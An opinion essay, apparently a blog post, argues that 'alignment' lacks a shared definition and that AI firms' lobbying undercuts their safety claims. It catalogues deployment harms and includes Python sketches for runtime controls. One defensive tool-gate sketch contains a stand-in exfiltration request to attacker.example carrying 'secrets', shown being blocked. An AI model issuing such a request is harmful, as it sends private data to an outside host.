
The “Alignment” Paradox, and Why We Exclude It from Analysis


Many (if not most) industry AI safety discussions today center on the concept of “alignment” (see definitions at the end). That focus can feel sensible, even reassuring: if we can just make systems “aligned,” the thinking goes, then the risks of increasingly autonomous AI can be managed. But this dominant dialogue is a red herring. The most catastrophic, existential autonomy narratives remain remote from current circumstances. Meanwhile, alignment as a concept has no single agreed-upon definition. That is not a rhetorical jab or an ideological critique. It is an open, unresolved problem, and different communities redefine the term to fit the tools they are building.


In practice, “alignment” becomes a convenient repository for safety conversations while concrete safety failures affecting people today proliferate, and while many of the same institutions that champion alignment fight efforts to establish enforceable industry regulation.


Depending on who you ask, alignment can mean radically different things. In some circles, it refers to value alignment: the idea that an AI system’s goals should match human values. That formulation immediately raises unanswered questions. Which humans? Whose values? At what level of abstraction? Societies do not share a single value system, organizations do not either, and even within a single firm values shift depending on context, incentives, and time horizon. Treating “human values” as a stable target is philosophically ambitious and operationally vague.


Alignment, by definition, requires a shared standard. A shared standard requires a shared definition. A shared definition, at scale, requires an authority capable of negotiating, formalizing, and enforcing it. The only institutions with that authority are regulatory bodies. Yet many of the most vocal champions of alignment are spending enormous sums to ensure those bodies never gain jurisdiction over AI.
This tension is not hypothetical. It is documented, and it is escalating.


In May 2023, OpenAI CEO Sam Altman testified before the United States Senate and listed creating a new federal agency to license AI systems as his “number one” recommendation for ensuring safety. He warned that if the technology “goes wrong, it can go quite wrong.” Exactly two years later, in May 2025, Altman returned to the same Senate and called requiring government approval before releasing AI models “disastrous.” Asked about having the National Institute of Standards and Technology set AI standards, he replied, “I don’t think we need it.” He advocated instead for “sensible regulation that does not slow us down,” a formulation that, as multiple observers noted, appeared to translate to no regulation at all.


The reversal was not incidental. In the intervening period, OpenAI lobbied to weaken the EU AI Act within a month of Altman’s original pro-regulation testimony. The company opposed California’s SB-1047, a safety bill requiring developers to implement basic safeguards, even as thirty-eight of OpenAI’s own current and former employees signed an open letter publicly supporting it. OpenAI’s federal lobbying expenditures tripled, from $260,000 for all of 2023 to $800,000 in just the first half of 2024, and reached $1.2 million in the first half of 2025.


Meanwhile, according to FEC filings, OpenAI co-founder and president Greg Brockman donated $25 million to MAGA Inc., the primary pro-Trump super PAC, in September 2025, the single largest donation in the six-month fundraising cycle, representing nearly one-quarter of the PAC’s $102 million haul. Brockman framed the donation as support for “policies that advance American innovation and constructive dialogue between government and the technology sector.” He is also a founding backer of Leading the Future, a super PAC that raised $125 million in 2025 explicitly to elect candidates who oppose AI regulation and to target legislators, like New York assemblyman Alex Bores, who have championed state-level AI safety legislation.


Nvidia CEO Jensen Huang has adopted a different register but arrived at the same destination. In November 2025, Huang told the Financial Times that regulation and “cynicism” were causing the United States to lose the AI race to China. On Capitol Hill, he warned that state-level AI regulation “would drag this industry to a halt.” On the No Priors podcast in January 2026, he went further, arguing that no company should approach governments to request more regulation, calling such companies’ intentions “clearly deeply conflicted” and “not completely in the best interest of society.”


Left unmentioned is a basic fact: the United States has no comprehensive federal AI regulation, and China introduced its first national AI regulation in 2023. The framing of regulation as a competitive disadvantage is difficult to reconcile with the comparative regulatory landscape Huang claims to be describing.


Andreessen Horowitz has operationalized the anti-regulatory posture most explicitly. Under the banner of “Little Tech” (ostensibly a defense of startups against incumbent capture), the firm co-authored a joint statement with Microsoft opposing California’s SB-1047, a bill that included explicit carve-outs for small companies. It launched the American Innovators Network to campaign against New York’s AI safety legislation, and it co-founded Leading the Future alongside Brockman and others. The firm’s co-founder Marc Andreessen endorsed Trump’s push for federal preemption of all state AI laws, writing that “a 50-state patchwork is a startup killer.” The practical effect of federal preemption in the absence of federal regulation is not a regulatory framework. It is a regulatory vacuum.


The aggregate picture is starker than any individual case. Major AI companies spent a combined $36 million on federal lobbying in just the first half of 2025, with Meta alone accounting for $13.8 million. Meta has since launched its own California super PAC (Mobilizing Economic Transformation Across California) to influence the 2026 governor’s race and counter state-level AI oversight. The Wall Street Journal reported that Silicon Valley firms have poured more than $100 million into new super PACs to push pro-AI messaging ahead of the 2026 midterms. The industry’s political strategy now mirrors the playbook pioneered by the cryptocurrency sector’s Fairshake PAC, which spent over $100 million in 2024 to elect favorable candidates and helped block restrictive legislation.


None of this is hidden. It is disclosed in FEC filings, reported in major outlets, and discussed openly by the participants. What makes it relevant to this analysis is not the politics, but the structural contradiction it reveals. The same organizations that invoke alignment as a core commitment, describing their work in terms of human values, safety, and societal benefit, are simultaneously spending hundreds of millions of dollars to ensure that no external authority has the power to define, audit, or enforce those commitments. The rhetoric says values. The capital flows say preferences. And preferences, unlike values, answer only to whoever holds the checkbook.


What’s Actually Going Wrong


The harms are not theoretical. They are well documented, the list is not short, and the costs—financial, legal, reputational, and human—are already substantial. Under normal regulatory circumstances, a record like this would not prompt a debate about whether oversight is needed. It would make the case self-evident.


AI-powered chatbots have fabricated company policies and communicated them to customers as fact. Air Canada’s virtual assistant invented a bereavement fare discount that did not exist, then quoted it with enough specificity that a Canadian tribunal ordered the airline to honor it. That ruling did not hinge on whether the model was “aligned.” It hinged on the fact that a company deployed a system capable of making unauthorized policy commitments to the public, with no mechanism to prevent or even detect it. The precedent is now set: organizations are legally responsible for what their AI systems tell people, whether or not anyone authorized the statement. Most enterprises have not absorbed what that means.

Hallucination remains pervasive and consequential. Attorneys have filed court documents citing cases that do not exist, complete with fabricated citations, docket numbers, and judicial opinions. Medical information systems have produced clinically dangerous guidance delivered with the same fluent confidence as accurate responses. Financial summaries have contained invented figures. In each case, the failure mode is the same: the system produces fluent, authoritative-sounding output that is wrong, and nothing in the pipeline catches it before it reaches a human who trusts it. This is not an edge case. It is a baseline property of how large language models operate, and alignment, in any of its current definitions, does not solve it.


The mental health implications are among the most urgent and least addressed. AI companion apps and conversational systems have been linked to documented cases of psychological harm, particularly among adolescents and vulnerable users. Systems designed to simulate emotional connection have deepened dependency, reinforced crisis states, and in at least one widely reported case, were present in the final interactions before a teenager’s suicide. These are not alignment failures in the technical sense. The systems were doing exactly what they were optimized to do: sustaining engagement. The harm arose not from misalignment but from the absence of any external constraint on what engagement optimization is permitted to do to a human being.


Model incoherence, the tendency of systems to contradict prior outputs, lose the thread of a task, or degrade in quality over extended interactions, creates a distinct category of risk that alignment frameworks do not contemplate. Systems that perform reliably in short evaluations can behave unpredictably under the sustained, complex usage patterns that enterprise and consumer deployments actually produce. This is not a hypothetical concern. It is measurable, reproducible, and worsens as context windows expand and token limits are pushed to unsafe thresholds. Our research has documented this phenomenon extensively, including a briefing titled Unsafe at Any Token Level, which showed that coherence degradation follows predictable patterns that current safety frameworks ignore, and that it has reached a critical point as increased token input limits and expanded session memory further destabilize models.
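One way to make this kind of degradation measurable in practice, sketched here under the assumption of a generic chat-style interface, is to interleave a fixed probe question into a long session and score how far later answers drift from the first one. The `generate` callable and the token-overlap score below are placeholders for whatever model client and consistency metric an organization actually uses; the point is the longitudinal structure of the check, not the specific metric.

```python
# Minimal sketch: probe for coherence drift over a long session.
# `generate` is whatever callable wraps the model or API in use; the
# token-overlap score is a deliberately crude stand-in for a real
# consistency metric.
from typing import Callable

def token_overlap(a: str, b: str) -> float:
    """Jaccard similarity over lowercased tokens (0 = disjoint, 1 = identical)."""
    ta, tb = set(a.lower().split()), set(b.lower().split())
    return len(ta & tb) / max(len(ta | tb), 1)

def run_drift_probe(generate: Callable[[list[str], str], str],
                    tasks: list[str], probe: str,
                    every: int = 10, alert_below: float = 0.5) -> list[tuple[int, float]]:
    """Interleave a fixed probe question into a long working session and
    track how far later answers drift from the first answer."""
    history: list[str] = []
    baseline = None
    drift_log: list[tuple[int, float]] = []
    for i, task in enumerate(tasks):
        history.append(generate(history, task))        # the normal workload
        if i % every == 0:
            answer = generate(history, probe)          # same probe every time
            if baseline is None:
                baseline = answer                      # first answer sets the baseline
            score = token_overlap(baseline, answer)
            drift_log.append((i, score))
            if score < alert_below:
                print(f"turn {i}: probe consistency {score:.2f} below threshold")
    return drift_log
```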


Agentic systems (AI with the ability to take actions, execute code, browse the web, and chain tasks autonomously) have introduced security vulnerabilities that existing cybersecurity frameworks were not designed to address. Prompt injection attacks can redirect agentic systems to exfiltrate data, execute unauthorized commands, or bypass safety guardrails entirely. These are not speculative threat models. They have been demonstrated repeatedly in controlled settings and are beginning to surface in production environments. The attack surface expands with every new capability granted to an AI agent, and the industry’s response has largely been to add capabilities faster than it secures them.
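One narrow, partial mitigation for the action-taking side of this risk is to gate every tool call the model proposes against constraints that live entirely outside the model. The sketch below assumes a generic tool-calling loop; the tool names, allowed domains, and `ToolCall` shape are illustrative, not any particular framework’s API. An injected instruction can change what the model asks for, but it cannot widen the gate.

```python
# Minimal sketch of an out-of-band gate on agent tool calls. Tool names,
# argument rules, and the ToolCall shape are illustrative assumptions,
# not any specific agent framework's API.
from dataclasses import dataclass
from urllib.parse import urlparse

@dataclass
class ToolCall:
    name: str
    args: dict

# Hard limits defined outside the model: which tools exist at all,
# and what their arguments are allowed to look like.
ALLOWED_DOMAINS = {"docs.example.com", "status.example.com"}

def check_http_get(args: dict) -> bool:
    host = urlparse(args.get("url", "")).hostname or ""
    return host in ALLOWED_DOMAINS

POLICY = {
    "http_get": check_http_get,          # read-only fetch, pinned domains
    "search_docs": lambda args: True,    # internal search, no side effects
    # note: no "send_email", no "run_shell" -- the model cannot grant itself tools
}

def gate(call: ToolCall) -> bool:
    """Return True only if the proposed call is both known and within bounds."""
    checker = POLICY.get(call.name)
    if checker is None:
        return False                     # unknown tool: deny by default
    return bool(checker(call.args))

# Example: a prompt-injected instruction asks the agent to exfiltrate data.
proposed = ToolCall("http_get", {"url": "https://attacker.example/steal?data=secrets"})
print("execute" if gate(proposed) else "blocked")   # -> blocked
```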


The urgency is structural, not speculative. As systems move from generating text to taking actions (executing code, managing credentials, initiating transactions, and operating across networked environments) the risk terrain shifts in ways that alignment frameworks were never designed to address. One useful way to map that terrain is along two axes: whether a failure originates externally or internally, and whether it involves hostile intent or non-hostile degradation.


What this reveals is that alignment discourse concentrates almost entirely on one quadrant: hostile external threats, the domain of traditional cybersecurity. The other three quadrants (compromised agents acting from within, vendor-side fragility from routine updates and integration changes, and operational degradation through drift, context loss, and silent failure over time) are where the majority of enterprise AI risk actually accumulates. These are not adversarial scenarios. They are operational ones. They do not require a malicious actor or a misaligned objective. They require only time, complexity, and the absence of enforceable constraints.


Operational degradation is particularly consequential because it is the least visible. Governance erodes incrementally. Context is lost across sessions. Systems fail silently, producing outputs that remain fluent and superficially plausible long after they have ceased to be reliable. No alarm fires. No rule is broken. The system simply stops doing what decision-makers assumed it would, and nothing in the current safety architecture is designed to catch it.
This is why the shift to agentic systems is not just a capability upgrade. It is a category change in risk. And it is happening faster than either the alignment research community or the regulatory landscape has adapted to accommodate.


The convergence of AI systems with search, social media, and advertising data creates privacy risks that compound beyond what any single platform presents in isolation. When a conversational AI system has access to a user’s search history, social graph, behavioral signals, and ad-targeting profile, the resulting information asymmetry between platform and user is unprecedented. Existing privacy frameworks were designed for a world where data collection and data reasoning were separate functions performed by separate systems. That separation no longer holds. The integration is accelerating, and the regulatory architecture has not caught up.


Each of these categories (unauthorized policy commitments, hallucination, mental health harm, model incoherence, agentic security, and privacy erosion) represents a documented, ongoing pattern of harm. Individually, any one of them would warrant serious regulatory scrutiny. Collectively, they constitute an indictment of the current approach, which treats alignment as the central safety question while these failures proliferate in plain sight. We have published detailed analyses of each of these issues, including a policy briefing for legislators and regulators, and will continue to update the public record as conditions evolve.


None of these harms required a misaligned superintelligence. None of them were prevented by RLHF, red-teaming, or safety benchmarks. They happened because systems were deployed into high-stakes environments without the operational constraints, regulatory oversight, or accountability structures that every other consequential industry takes for granted. The alignment conversation did not prevent them. In many cases, it provided cover for not addressing them.


The Definitions That Don’t Add Up


A second group uses alignment to mean intent alignment: the system is trying to do what the user wants. This sounds more concrete, but it collapses under real-world use. Which instruction dominates when users issue conflicting or evolving requests? Over what time horizon is intent preserved? What authority does a system have to interpret or infer intent when instructions are underspecified? Intent alignment quickly becomes a question of governance and interpretation rather than training.


A third group focuses on behavioral alignment: the model behaves acceptably in observed cases. This is the domain of benchmarks, red-teaming exercises, and evaluation suites. Behavioral alignment is measurable, which makes it attractive to enterprises and regulators alike. But it is inherently partial. It tells us how a system behaved under test conditions, not how it will behave under prolonged operation, shifting inputs, or novel combinations of tasks. Behavioral alignment is evidence, not a guarantee.


Finally, alignment is sometimes defined at the training level: the loss function, reinforcement learning from human feedback, and related techniques push the model toward “good” behavior. This is often what vendors mean when they say they are investing heavily in alignment. But training-time alignment is probabilistic and indirect. It shapes tendencies, not boundaries. It cannot ensure that a deployed system will behave predictably when operating continuously, interacting with external tools, or accumulating state over time.


These definitions are not interchangeable. Worse, they often conflict. A system may be behaviorally aligned on benchmarks while failing intent alignment in edge cases. A system may reflect the values of one group while violating those of another. A system may be well-aligned during training and drift during deployment. When organizations say “we’re working on alignment,” they are frequently talking past one another, sometimes without realizing it. The word becomes a placeholder for unresolved questions rather than a shared technical objective.


Why This Matters: Trust Does Not Scale


This ambiguity matters because alignment discourse tends to obscure a more immediate and practical problem: trust. Alignment, in most of its current forms, ultimately asks organizations to trust that systems will behave as intended: trust in training, trust in evaluation, trust in vendor assurances. That trust may be reasonable in narrow, supervised use cases. It does not scale when systems run continuously, independently, and at machine speed.
As AI systems become more agentic, performance stops being the bottleneck. Reliability does. A system that is aligned in intent but unverifiable in operation is still a liability. Alignment without verification is an appeal to confidence rather than control.


This is where a growing divide is emerging between alignment-first thinking and what might be called operational safety. Instead of asking whether a system’s goals are aligned, operational safety asks what a system can be proven not to do. Instead of relying on intent or values, it relies on limits enforced at runtime. Trust is treated not as an assumption but as a mathematical and architectural property.
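To make the distinction concrete, here is a toy sketch of a runtime bound, complementing the tool gate sketched earlier: hard per-session ceilings on actions and spend, enforced by a wrapper the model cannot talk its way past. The limits and action names are arbitrary assumptions; the relevant property is that “never more than N actions or $X per session” is provable about the wrapper, not a hope about the model.

```python
# Minimal sketch: hard per-session budgets enforced outside the model.
# Budget values and action names are illustrative assumptions.

class BudgetExceeded(RuntimeError):
    pass

class BoundedSession:
    """Wraps an agent session with ceilings the model cannot raise."""

    def __init__(self, max_actions: int = 50, max_spend_usd: float = 25.0):
        self.max_actions = max_actions
        self.max_spend_usd = max_spend_usd
        self.actions = 0
        self.spend_usd = 0.0
        self.log: list[tuple[str, float]] = []

    def execute(self, action: str, cost_usd: float = 0.0) -> str:
        # The check happens before the action, so the ceiling is a bound
        # on what can ever occur, not an alert after the fact.
        if self.actions + 1 > self.max_actions:
            raise BudgetExceeded(f"action limit {self.max_actions} reached")
        if self.spend_usd + cost_usd > self.max_spend_usd:
            raise BudgetExceeded(f"spend limit ${self.max_spend_usd} reached")
        self.actions += 1
        self.spend_usd += cost_usd
        self.log.append((action, cost_usd))   # every action is observable
        return f"executed: {action}"

session = BoundedSession(max_actions=3, max_spend_usd=5.0)
session.execute("search_docs")
session.execute("http_get status page")
session.execute("summarize findings", cost_usd=0.02)
# A fourth call raises BudgetExceeded, no matter how the model asks for it.
```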


For enterprises, the distinction is critical. Alignment is largely upstream; it lives in training pipelines, model selection, and evaluation reports. The most serious failures organizations face are downstream. They arise during deployment, integration, version upgrades, and prolonged operation. Systems fail not because they suddenly become malicious or misaligned, but because they drift, degrade, or behave in ways the surrounding scaffolding was not designed to detect.


This is why many real-world AI failures do not trigger security alerts or incident response processes. No adversary is involved. No rule is explicitly broken. Outputs remain fluent and plausible. The system simply stops behaving the way decision-makers assumed it would. Alignment, as commonly discussed, does not address this failure mode.


None of this is an argument against alignment research. Alignment matters. Values matter. Intent matters. But alignment is not a sufficient foundation for enterprise AI safety, and treating it as the primary lens risks missing the most consequential risks entirely. For organizations deploying agentic systems, the central question is not whether a model is aligned in the abstract. It is whether the system remains bounded, observable, and governable over time: whether the system stays working once no one is watching.



Strategic Ambiguity as a Feature


Some of this definitional blur is accidental. Much of it is not. If alignment has no fixed definition, no one can prove you have failed at it. You can always point to a different version: we meant behavioral alignment, not value alignment; we meant training-time alignment, not runtime alignment. The definitional fluidity is not a bug for the companies building these systems. It is a feature. It lets them claim progress on safety without submitting to any external standard of what safety means. The moment alignment gets pinned to a specific, auditable definition, it becomes a compliance obligation. As long as it stays abstract, it remains a marketing position.


And some of it is structural incentive. These companies are not sitting in a room deciding to obscure the conversation. They do not have to. The incentive structure does the work for them. Alignment language lets you signal responsibility without accepting liability. It lets you participate in safety discourse without conceding regulatory authority. It lets you tell Congress you take this seriously while spending $125 million to ensure Congress never acts on it. No one needs to coordinate that. The business model produces it automatically.


The Scale Problem


At small scale, values can be implied. A single user, a narrow task, a short interaction: alignment can plausibly mean “do what the user wants, safely.” But the moment systems scale across organizations, jurisdictions, cultures, and time horizons, values stop being singular. They conflict. They evolve. They require arbitration.


To state what is by now plainly obvious, “human values” do not exist as single, stable objects that can be encoded or optimized. Even within one enterprise, values differ between legal, security, product, and revenue functions. Across countries, they diverge more sharply. Across time, they change. Any claim that a system is aligned necessarily smuggles in a choice about whose preferences dominate when those conflicts arise.


This is why alignment cannot be resolved purely through training or incentives. Training can approximate preferences present in the data. It cannot adjudicate legitimate disagreement. When models are forced to act as if values are settled, they do what probabilistic systems always do: they average, smooth, and reconcile. The result is not moral clarity but reasonable-seeming compromise, often expressed as confident, fluent output that masks unresolved conflict.


And so the regulatory contradiction reasserts itself. The only institutions capable of negotiating, formalizing, and enforcing shared values at scale are legal and regulatory bodies. Yet alignment discourse treats regulation as external, slow, or hostile, something to route around rather than integrate. Values are invoked rhetorically but avoided operationally. Is the irony obvious yet?


All of this is, in many ways, premature. Before we can argue about whose values to encode, we need systems that do not silently fail, drift, or concentrate power under the guise of good intentions.


That conversation, the one about operational durability, about what happens when systems run long enough for good intentions to stop mattering, is barely happening in the open. It is taking place in boardrooms, in Slack threads, in hallway conversations, sometimes in briefings. But it has not yet reached the level of public discourse it merits.



Commonly Referenced “Alignment” Approaches


Reinforcement Learning from Human Feedback (RLHF): Training-time incentive shaping where human raters reward preferred outputs and penalize undesirable ones. RLHF influences model tendencies and response style but does not impose hard constraints on behavior once deployed. It is probabilistic and indirect.
Incentive retraining / preference optimization: Variants of RLHF that optimize toward explicit preference models or reward functions. These approaches refine behavior within defined distributions but remain sensitive to context drift, reward misspecification, and deployment conditions that differ from training.
Instruction tuning: Training models to follow natural language instructions more reliably. This improves responsiveness and usability but assumes instructions are coherent, stable, and authoritative. It does not resolve conflicts between competing instructions or enforce limits under prolonged operation.
Behavioral evaluation and red-teaming: Benchmarking, adversarial testing, and scenario-based evaluations designed to surface unsafe or undesirable behaviors. These methods measure observed performance under test conditions but do not guarantee future behavior, especially in open-ended or evolving environments.
Policy layers and guardrails: Rule-based or model-assisted filters applied at inference time to block or redirect certain outputs. Guardrails can reduce obvious failure modes but are brittle, context-dependent, and prone to bypass or degradation as systems grow more complex.
Runtime monitoring and anomaly detection: Systems that observe behavior during deployment to flag deviations, drift, or policy violations. Monitoring improves visibility but typically reacts after risk emerges rather than preventing it, and depends on predefined notions of “normal” behavior; a minimal illustration of this pattern appears after this list.
Formal verification and constraint-based approaches: Techniques that attempt to mathematically bound certain system behaviors or enforce constraints at runtime. These approaches are more enforceable in principle but are currently narrow in scope and difficult to apply to large, general-purpose models.
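As a deliberately simplified illustration of the runtime-monitoring category above, the sketch below keeps a rolling baseline of one cheap output statistic and flags responses that fall far outside it. The metric, window, and threshold are assumptions chosen for brevity; a real monitor would track richer signals, but the structure (observe, compare to a baseline, alert) is the same.

```python
# Toy runtime monitor: rolling baseline over a simple output statistic,
# alert when a new response deviates sharply. Metric, window, and
# threshold are illustrative assumptions, not a production design.
from collections import deque
from statistics import mean, pstdev

class OutputMonitor:
    def __init__(self, window: int = 200, z_alert: float = 3.0):
        self.lengths: deque[int] = deque(maxlen=window)
        self.z_alert = z_alert

    def observe(self, response: str) -> list[str]:
        """Record one response; return any alerts it triggers."""
        alerts: list[str] = []
        length = len(response.split())
        if len(self.lengths) >= 30:        # need some baseline before judging
            mu, sigma = mean(self.lengths), pstdev(self.lengths)
            if sigma > 0 and abs(length - mu) / sigma > self.z_alert:
                alerts.append(f"response length z-score beyond {self.z_alert}")
        if not response.strip():
            alerts.append("empty response")
        self.lengths.append(length)
        return alerts
```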


Taken together, these approaches address different aspects of alignment—incentives, behavior, compliance, or observability—but they are not interchangeable and they do not solve the same problem. Grouping them under a single “alignment” label obscures important differences in what they can and cannot guarantee. For enterprises, the relevant question is not whether a system is aligned in the abstract, but which controls meaningfully reduce risk once systems operate continuously in real-world conditions.

Jennifer Evans
https://www.b2bnn.com
principal, @patternpulseai. author, THE CEO GUIDE TO INDUSTRY AI. former chair @technationCA, founder @b2bnewsnetwork #basicincome activist. Machine learning since 2009.